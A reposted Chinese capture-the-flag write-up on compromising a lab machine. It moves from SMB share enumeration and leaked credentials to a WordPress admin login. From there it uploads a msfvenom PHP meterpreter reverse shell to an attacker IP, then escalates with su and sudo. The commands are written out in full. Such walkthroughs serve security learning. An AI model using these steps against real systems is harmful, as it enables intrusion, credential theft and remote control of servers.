ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

CTF—攻防练习之SMB私钥泄露

2019-06-07 11:03:26  阅读:263  来源: 互联网

标签:私钥 smbclient 端口 192.168 smb 32.155 CTF ssh SMB


攻击机:192.168.32.152

靶机 :192.168.32.155

 

打开靶机

nmap一下

我们看到了开放了 ssh,smb,mysql这些端口,还有一个大端口

对smb服务我们可以
1.使用空口令,弱口令尝试,查看敏感文件

-- smbclient -L IP
-- smbclient '\\IP\$share'
-- get敏感文件

2.远程溢出漏洞分析
--searchsploit samba版本号

我们用smb -L 192.168.32.155 列出smb索所分享的所有目录,用空口令刚好可以登录

发现一个共享设备打印机,一个共享文件还有一个空连接web服务器
我们查看下这些文件
smbclient '\\192.168.32.155\print$'
smbclient '\\192.168.32.155\share$'
smbclient '\\192.168.32.155\IPC$'


发现目前只有share的文件可以利用

那么就get 下载吧
发现在deets.txt文件中有串密码12345

在wordpress目录中发现config配置文件信息,下载下来,发现服务器admin和password

那么我们就尝试用该账户和密码登录mysql数据库

不允许远程连接。。那么我们想办法登录到远程服务器,ssh也是开放的端口,试试ssh

ssh Admin@192.168.32.155 试下出现的两个密码都不对

试试searchsploit 探索性smb版本有没有可利用的溢出漏洞

nmap -A -v -T4 192.168.32.155 查看端口对应版本号

 searchsploit 。。。 没有发现任何溢出漏洞

 

我们暂时放弃smb和ssh,用http的端口试试,dirb一下

有关admin打开试试

 

在这里我们输入刚才的Admin和密码我们就登进去了!

那么我们就制作一个webshell木马上传上去

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 生成一个反弹shell上传php木马

保存下来
再打开metasploit启动监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.32.152
exploit
再打开刚才的网页,找到了一个上传webshell的位置

点击update file

 success!


再打开路径获得反弹shell

http://靶场ip/wordpress/wp-content/thems/twentyfifteen/404.php

启动,会话秒断。。。试了很久都不行

不知道怎么回事,回头问问大佬

进入服务器后,再用

python -c "import pty;pty.spawn("/bin/bash") 优化终端
然后cat /etc/passwd 发现home下一个用户togie
su togie 密码为找到的12345 sudo su 提权,靶场权限拿下
最后根目录下有flag文件

 

标签:私钥,smbclient,端口,192.168,smb,32.155,CTF,ssh,SMB
来源: https://www.cnblogs.com/zhaoyixiang/p/10987335.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有